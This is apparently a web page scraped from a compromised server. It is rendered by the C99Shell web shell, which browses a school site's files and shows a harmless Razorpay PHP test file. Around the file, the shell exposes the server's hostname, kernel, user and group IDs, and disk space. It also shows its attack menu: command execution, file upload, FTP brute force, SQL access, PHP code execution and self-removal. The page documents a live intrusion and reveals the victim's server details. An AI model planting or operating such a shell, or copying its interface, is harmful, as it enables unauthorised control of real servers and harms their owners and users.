!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/school.picotech.app/public_html/vendor/razorpay/razorpay/tests/   drwxr-xr-x
Free 28.19 GB of 117.98 GB (23.89%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ExceptionTest.php (2.48 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Razorpay\Tests;

use 
Razorpay\Api\Request;
use 
Razorpay\Api\Errors;

class 
ExceptionTest extends TestCase
{
    public function 
setUp(): void
    
{
        
parent::setUp();
    }
    
    
/**
     * Create an order from json payload
     */
    
public function testCreateJsonOrderException()
    {
        
$payload $this->payload();
        
$attribute json_encode($payload);
        try
        {
         
$data $this->api->order->create($attribute);

         
$this->assertTrue(is_array($data->toArray()));

        }
        catch(
Error $e){
            throw new 
InvalidArgumentException($e);
        }
    }

    
/**
     * Create an order from set header application/json
     */
    
public function testCreateOrderSetHeaderException()
    {
        
$attribute $this->payload();
        
        try
        {
         
$this->api->setHeader('content-type''application/json');

         
$data $this->api->order->create($attribute);

         
$this->assertTrue(is_array($data->toArray()));
        
        }
        catch(
Error $e){
            throw new 
InvalidArgumentException($e);
        }
    }

    
/**
     * Create an order
     */
    
public function testCreateOrderSuccess()
    {
        
$attribute $this->payload();
        try
        {   
         
$data $this->api->order->create($attribute);

         
$this->assertTrue(is_array($data->toArray()));

        }
        catch(
Error $e){
            throw new 
InvalidArgumentException($e);
        }
    }
    
    private function 
payload(){
        
$date = new \DateTime();
        
$receiptId $date->getTimestamp();
        return [
                 
"receipt"=> (string) $receiptId,
                 
"amount"=>54900,
                 
"currency"=>"INR",
                 
"payment_capture"=>1,
                 
"app_offer"=>0,
                 
"notes" => [
                    
"woocommerce_order_number" => 240186
                 
],
                 
"line_items_total" => 54900,
                 
"line_items" => [
                        [
                            
"type" => "e-commerce",
                            
"sku"=> "",
                            
"variant_id" => "211444",
                            
"price" => "54900",
                            
"offer_price" => "54900",
                            
"quantity" => 1,
                            
"name" => "Personalised Kids T-shirts",
                            
"description" => "description"
                        
]
                    ]
                ];
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0037 ]--